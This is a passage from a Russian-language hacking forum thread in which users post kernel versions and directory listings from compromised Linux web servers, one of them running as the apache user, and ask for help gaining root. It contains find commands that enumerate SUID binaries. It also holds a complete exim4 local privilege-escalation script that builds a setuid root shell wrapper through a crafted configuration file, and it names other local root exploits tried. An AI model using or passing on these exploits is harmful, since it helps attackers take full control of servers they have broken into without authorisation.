Старый 07.01.2012, 18:40   #311
Ololosh
 
Регистрация: 08.12.2011
Сообщений: 9
Репутация: -3
По умолчанию

и вот еще
2.6.30-std-def-alt10 #1 SMP Mon Aug 17 17:09:21 UTC 2009 x86_64
Не сочтите за наглость,можно ссылкой? Не то что бы я не умел гуглить, просто в рутанье нубяра))
Ololosh вне форума   Ответить с цитированием
Старый 07.01.2012, 18:49   #312
wwwMedic
 
Регистрация: 13.09.2011
Сообщений: 27
Репутация: 10
По умолчанию

Ololosh, проявляем внимательность:
Цитата:
2009 => пробуй glibc
похоже у нас разные гуглы
первая же ссылка по запросу "рутанье"
wwwMedic вне форума   Ответить с цитированием
Старый 07.01.2012, 19:00   #313
Ololosh
 
Регистрация: 08.12.2011
Сообщений: 9
Репутация: -3
По умолчанию

Да это все я читал. Запускаю сплоит, но в ответ "не уязвимый"
Ololosh вне форума   Ответить с цитированием
Старый 07.01.2012, 19:09   #314
wwwMedic
 
Регистрация: 13.09.2011
Сообщений: 27
Репутация: 10
По умолчанию

тогда пробуй https://rdot.org/forum/showthread.php?t=714
тут в теме, кстати, очень много полезного, в частности, что именно надо выкладывать из инфы
и проверь пм
wwwMedic вне форума   Ответить с цитированием
Старый 07.01.2012, 20:23   #315
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
2.6.18-6-xen-amd64 #1 SMP Fri Aug 21 16:46:08 UTC 2009 x86_64
Linux version 2.6.18-6-xen-amd64 (Debian 2.6.18.dfsg.1-24etch4) (dannf@debian.org) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Fri Aug 21 16:46:08 UTC 2009
Debian GNU/Linux 4.0
Цитата:
cat: /proc/sys/vm/mmap_min_addr: No such file or directory
пробовал glibc, abftw, robert, vmsplice, enlightenment
col вне форума   Ответить с цитированием
Старый 08.01.2012, 14:34   #316
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

find /usr/bin -type f -perm -u+s -exec ls -la {} \;
find /usr/sbin -type f -perm -u+s -exec ls -la {} \;
find /bin -type f -perm -u+s -exec ls -la {} \;
find /sbin -type f -perm -u+s -exec ls -la {} \;
find /usr/local/bin/ -type f -perm -u+s -exec ls -la {} \;
find /usr/local/sbin/ -type f -perm -u+s -exec ls -la {} \;
find /usr/local/libexec/ -type f -perm -u+s -exec ls -la {} \;
Pashkela вне форума   Ответить с цитированием
Старый 08.01.2012, 17:33   #317
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
-rwsr-xr-x 1 root root 88936 Jan 2 2008 /bin/mount
-rwsr-xr-x 1 root root 33064 Jan 30 2007 /bin/ping
-rwsr-xr-x 1 root root 28576 Jan 30 2007 /bin/ping6
-rwsr-xr-x 1 root root 32912 Jan 14 2009 /bin/su
-rwsr-xr-x 1 root root 66912 Jan 2 2008 /bin/umount
-r-sr-xr-x 1 root root 18144 Oct 21 2007 /sbin/unix_chkpwd
-rwsr-sr-x 1 root root 9384 May 16 2007 /usr/bin/X
-rwsr-xr-x 1 root root 34632 Jan 14 2009 /usr/bin/chfn
-rwsr-xr-x 1 root root 29160 Jan 14 2009 /usr/bin/chsh
-rwsr-xr-x 1 root root 43144 Jan 14 2009 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 872944 Mar 12 2007 /usr/bin/gpg
-rwsr-xr-x 1 root root 15696 Apr 15 2007 /usr/bin/ksu
-rwsr-xr-x 1 root root 52680 May 25 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 24400 Jan 14 2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 34888 Jan 14 2009 /usr/bin/passwd
-rwsr-xr-x 1 root root 23272 Nov 23 2006 /usr/bin/traceroute.lbl
-rwsr-xr-x 1 root root 727792 Jan 20 2007 /usr/sbin/exim4
в сторону exim4 и иксов копать?
col вне форума   Ответить с цитированием
Старый 08.01.2012, 18:20   #318
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

попробуй, только отпишись потом:

Цитата:
#!/bin/sh
# sh test_exim.sh 2>&1
# /usr/sbin/exim -bV - show version
# cat /etc/exim.conf - exim config
cat > sh.c << EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
EOF
gcc sh.c -o sh
# e.conf:
cat > e.conf << EOF
spool_directory=\${run{/bin/chown 0:0 sh}}\${run{/bin/chmod 4755 sh}}\${run{/bin/rm sh.c e.conf}}
EOF
# exploit:
/usr/sbin/exim4 -Ce.conf -q
Pashkela вне форума   Ответить с цитированием
Старый 08.01.2012, 18:41   #319
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
sh-3.1$ ./z.sh
exim: permission denied
дохлый номер
col вне форума   Ответить с цитированием
Старый 14.01.2012, 00:16   #320
celebro
 
Регистрация: 05.07.2010
Сообщений: 4
Репутация: 0
По умолчанию

помогите рутануть
Код:
Linux ******** 2.6.18-194.32.1.el5 #1 SMP Mon Dec 20 10:52:42 EST 2010 x86_64
Код:
$ id
uid=48(apache) gid=48(apache) groups=48(apache)
$ ls -la /boot
total 5914
Код:
drwxr-xr-x  5 root root    1024 Feb 21  2011 .
drwxr-xr-x 24 root root    4096 May  7  2011 ..
drwxr-xr-x  2 root root    1024 Feb 21  2011 .rackspace
-rw-r--r--  1 root root     163 Dec 20  2010 .vmlinuz-2.6.18-194.32.1.el5.hmac
-rw-r--r--  1 root root 1244821 Dec 20  2010 System.map-2.6.18-194.32.1.el5
-rw-r--r--  1 root root   66892 Dec 20  2010 config-2.6.18-194.32.1.el5
drwxr-xr-x  2 root root    1024 Feb 21  2011 grub
-rw-------  1 root root 2610276 Feb 21  2011 initrd-2.6.18-194.32.1.el5.img
drwx------  2 root root   12288 Feb 21  2011 lost+found
-rw-r--r--  1 root root  112807 Dec 20  2010 symvers-2.6.18-194.32.1.el5.gz
-rw-r--r--  1 root root 1955804 Dec 20  2010 vmlinuz-2.6.18-194.32.1.el5
$ ls -la --full-time /lib/lib*
Код:
-rwxr-xr-x 1 root root    7664 2011-06-08 10:33:00.000000000 -0500 /lib/libBrokenLocale-2.5.so
lrwxrwxrwx 1 root root      22 2011-07-08 02:47:05.000000000 -0500 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
-rwxr-xr-x 1 root root   16704 2011-06-08 10:33:01.000000000 -0500 /lib/libSegFault.so
-rwxr-xr-x 1 root root   14128 2011-06-08 10:33:01.000000000 -0500 /lib/libanl-2.5.so
lrwxrwxrwx 1 root root      13 2011-07-08 02:47:05.000000000 -0500 /lib/libanl.so.1 -> libanl-2.5.so
lrwxrwxrwx 1 root root      17 2011-04-13 02:50:20.000000000 -0500 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root   95740 2010-11-05 10:21:28.000000000 -0500 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root      19 2011-04-13 02:50:20.000000000 -0500 /lib/libauparse.so.0 -> libauparse.so.0.0.0
-rwxr-xr-x 1 root root   54832 2010-11-05 10:21:28.000000000 -0500 /lib/libauparse.so.0.0.0
lrwxrwxrwx 1 root root      15 2011-02-21 13:41:38.000000000 -0600 /lib/libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root   37316 2010-10-05 10:57:26.000000000 -0500 /lib/libblkid.so.1.0
-rwxr-xr-x 1 root root 1693812 2011-06-08 10:33:01.000000000 -0500 /lib/libc-2.5.so
lrwxrwxrwx 1 root root      11 2011-07-08 02:47:05.000000000 -0500 /lib/libc.so.6 -> libc-2.5.so
-rwxr-xr-x 1 root root  191708 2011-06-08 10:33:01.000000000 -0500 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root      14 2011-07-08 02:47:05.000000000 -0500 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 2011-02-21 13:41:38.000000000 -0600 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    6300 2010-10-05 10:57:26.000000000 -0500 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root   45432 2011-06-08 10:33:01.000000000 -0500 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root      15 2011-07-08 02:47:05.000000000 -0500 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295456 2010-12-07 11:19:01.000000000 -0600 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      19 2011-02-21 13:41:52.000000000 -0600 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root 1010140 2010-05-26 07:20:06.000000000 -0500 /lib/libdb-4.3.so
-r--r--r-- 1 root root   41914 2010-11-09 06:41:12.000000000 -0600 /lib/libdevmapper-event.a
lrwxrwxrwx 1 root root      26 2011-04-13 02:50:21.000000000 -0500 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root   16952 2010-11-09 06:41:17.000000000 -0600 /lib/libdevmapper-event.so.1.02
-r--r--r-- 1 root root  458948 2010-11-09 06:41:07.000000000 -0600 /lib/libdevmapper.a
lrwxrwxrwx 1 root root      20 2011-04-13 02:50:21.000000000 -0500 /lib/libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root  148092 2010-11-09 06:41:16.000000000 -0600 /lib/libdevmapper.so.1.02
-rwxr-xr-x 1 root root   20668 2011-06-08 10:33:01.000000000 -0500 /lib/libdl-2.5.so
lrwxrwxrwx 1 root root      12 2011-07-08 02:47:05.000000000 -0500 /lib/libdl.so.2 -> libdl-2.5.so
lrwxrwxrwx 1 root root      13 2011-02-21 13:41:38.000000000 -0600 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root   20192 2010-10-05 10:57:26.000000000 -0500 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root      16 2011-02-21 13:41:38.000000000 -0600 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root  113764 2010-10-05 10:57:26.000000000 -0500 /lib/libext2fs.so.2.4
-rwxr-xr-x 1 root root   45192 2010-10-06 16:35:08.000000000 -0500 /lib/libgcc_s-4.1.2-20080825.so.1
lrwxrwxrwx 1 root root      28 2011-04-13 02:50:07.000000000 -0500 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
-rwxr-xr-x 1 root root   27964 2007-01-18 13:32:57.000000000 -0600 /lib/libiw.so.28
-rwxr-xr-x 1 root root    6596 2006-08-22 12:24:04.000000000 -0500 /lib/libkeyutils-1.2.so
lrwxrwxrwx 1 root root      18 2011-02-21 13:41:11.000000000 -0600 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
-rwxr-xr-x 1 root root  214572 2011-06-08 10:33:01.000000000 -0500 /lib/libm-2.5.so
lrwxrwxrwx 1 root root      11 2011-07-08 02:47:05.000000000 -0500 /lib/libm.so.6 -> libm-2.5.so
-rwxr-xr-x 1 root root  107924 2011-06-08 10:33:01.000000000 -0500 /lib/libnsl-2.5.so
lrwxrwxrwx 1 root root      13 2011-07-08 02:47:05.000000000 -0500 /lib/libnsl.so.1 -> libnsl-2.5.so
-rwxr-xr-x 1 root root   36416 2011-06-08 10:33:01.000000000 -0500 /lib/libnss_compat-2.5.so
lrwxrwxrwx 1 root root      20 2011-07-08 02:47:05.000000000 -0500 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
-rwxr-xr-x 1 root root  825028 2010-04-08 12:46:31.000000000 -0500 /lib/libnss_db-2.2.so
lrwxrwxrwx 1 root root      16 2011-02-21 13:41:53.000000000 -0600 /lib/libnss_db.so.2 -> libnss_db-2.2.so
-rwxr-xr-x 1 root root   21948 2011-06-08 10:33:01.000000000 -0500 /lib/libnss_dns-2.5.so
lrwxrwxrwx 1 root root      17 2011-07-08 02:47:05.000000000 -0500 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
-rwxr-xr-x 1 root root   50848 2011-06-08 10:33:02.000000000 -0500 /lib/libnss_files-2.5.so
lrwxrwxrwx 1 root root      19 2011-07-08 02:47:05.000000000 -0500 /lib/libnss_files.so.2 -> libnss_files-2.5.so
-rwxr-xr-x 1 root root   22764 2011-06-08 10:33:02.000000000 -0500 /lib/libnss_hesiod-2.5.so
lrwxrwxrwx 1 root root      20 2011-07-08 02:47:05.000000000 -0500 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
-rwxr-xr-x 1 root root   46536 2011-06-08 10:33:02.000000000 -0500 /lib/libnss_nis-2.5.so
lrwxrwxrwx 1 root root      17 2011-07-08 02:47:05.000000000 -0500 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
-rwxr-xr-x 1 root root   55804 2011-06-08 10:33:02.000000000 -0500 /lib/libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root      21 2011-07-08 02:47:05.000000000 -0500 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
lrwxrwxrwx 1 root root      16 2011-02-21 13:41:35.000000000 -0600 /lib/libpam.so.0 -> libpam.so.0.81.5
-rwxr-xr-x 1 root root   43020 2010-10-21 14:56:19.000000000 -0500 /lib/libpam.so.0.81.5
lrwxrwxrwx 1 root root      21 2011-02-21 13:41:35.000000000 -0600 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
-rwxr-xr-x 1 root root    8624 2010-10-21 14:56:19.000000000 -0500 /lib/libpam_misc.so.0.81.2
lrwxrwxrwx 1 root root      17 2011-02-21 13:41:35.000000000 -0600 /lib/libpamc.so.0 -> libpamc.so.0.81.0
-rwxr-xr-x 1 root root    9868 2010-10-21 14:56:19.000000000 -0500 /lib/libpamc.so.0.81.0
-rwxr-xr-x 1 root root  137908 2011-06-08 10:33:02.000000000 -0500 /lib/libpthread-2.5.so
lrwxrwxrwx 1 root root      17 2011-07-08 02:47:05.000000000 -0500 /lib/libpthread.so.0 -> libpthread-2.5.so
-rwxr-xr-x 1 root root   80636 2011-06-08 10:33:02.000000000 -0500 /lib/libresolv-2.5.so
lrwxrwxrwx 1 root root      16 2011-07-08 02:47:05.000000000 -0500 /lib/libresolv.so.2 -> libresolv-2.5.so
-rwxr-xr-x 1 root root   46144 2011-06-08 10:33:02.000000000 -0500 /lib/librt-2.5.so
lrwxrwxrwx 1 root root      12 2011-07-08 02:47:05.000000000 -0500 /lib/librt.so.1 -> librt-2.5.so
-rwxr-xr-x 1 root root   91892 2010-11-16 05:35:21.000000000 -0600 /lib/libselinux.so.1
-rwxr-xr-x 1 root root  243928 2009-10-27 09:34:52.000000000 -0500 /lib/libsepol.so.1
lrwxrwxrwx 1 root root      12 2011-02-21 13:41:38.000000000 -0600 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root   19008 2010-10-05 10:57:26.000000000 -0500 /lib/libss.so.2.0
-rwxr-xr-x 1 root root  291172 2010-12-07 11:19:01.000000000 -0600 /lib/libssl.so.0.9.8e
lrwxrwxrwx 1 root root      16 2011-02-21 13:41:52.000000000 -0600 /lib/libssl.so.6 -> libssl.so.0.9.8e
lrwxrwxrwx 1 root root      19 2011-02-21 13:41:13.000000000 -0600 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root   11828 2006-07-13 02:11:11.000000000 -0500 /lib/libtermcap.so.2.0.8
-rwxr-xr-x 1 root root   33852 2011-06-08 10:33:02.000000000 -0500 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root      19 2011-07-08 02:47:05.000000000 -0500 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root   13492 2011-06-08 10:33:02.000000000 -0500 /lib/libutil-2.5.so
lrwxrwxrwx 1 root root      14 2011-07-08 02:47:05.000000000 -0500 /lib/libutil.so.1 -> libutil-2.5.so
lrwxrwxrwx 1 root root      14 2011-02-21 13:41:38.000000000 -0600 /lib/libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root   14144 2010-10-05 10:57:26.000000000 -0500 /lib/libuuid.so.1.2
lrwxrwxrwx 1 root root      16 2011-02-21 13:41:12.000000000 -0600 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root   31344 2009-04-10 02:17:10.000000000 -0500 /lib/libwrap.so.0.7.6
celebro вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot